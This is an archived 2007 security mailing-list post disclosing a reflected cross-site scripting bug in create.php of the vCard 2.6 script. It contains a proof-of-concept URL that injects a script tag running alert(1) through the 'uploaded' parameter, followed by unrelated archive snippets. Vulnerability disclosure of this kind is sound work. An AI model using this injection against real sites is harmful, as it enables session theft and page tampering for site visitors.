XSS Remote In vCard 2.6 (c)2002

From: "RaeD Hasadya" <raed@xxxxxxxxxxx>
Date: Sun, 04 Mar 2007 19:53:54 +0800

Discovered By : Hasadya Raed
Contact : RaeD@xxxxxxxxxxx
Script: vCard 2.6 (c)2002

******************************************************************************
Bug in : create.php

********************************************************************************
Exploit :
http://www.victim.com/path/create.php?uploaded=";>**********alert(1);</script>
********************************************************************************

--
_______________________________________________
Get your free email from http://bsdmail.com

Prev by Date: HITBSecConf2007 - Malaysia: Call for Papers now Open
Next by Date: Wordpress <= v2.1.0
Previous by thread: HITBSecConf2007 - Malaysia: Call for Papers now Open
Next by thread: Wordpress <= v2.1.0
Index(es):
- Date
- Thread

Relevant Pages

cvs-src summary for June 14-21
... Intel PRO/10GbE driver MFC'ed ... Max responded, saying that since the script only adds lines to the output, ... Max later backed out the commit. ... Bruce Evans fixed a bug that allowed users to crash the system by ...
(freebsd-current)
Re: SQLite 3.3.16 nulls test results
... Here are the results from Brian's script: ... Inserting values ... Selecting row with Marge ... Perhaps there's a bug somewhere. ...
(perl.dbi.users)
RE: TXT or HTML? -- IE NEW BUG
... Subject: TXT or HTML? ... -- IE NEW BUG ... vulnerability. ... However, the script would run in the web page's domain, so it ...
(Bugtraq)
Re: IE javascript bug: global variable
... That's another aspect of this bug that puzzles me; ... code in the first block should "run to completion" before the ... instantiation of the second block. ... I see nothing to suggest that the first script ...
(comp.lang.javascript)
Re: subprocess "handle is invalid" error
... So I switched to subprocess. ... I think this is a subprocess bug. ... It is often attributed to py2exe because ... Consider ths little script: ...
(comp.lang.python)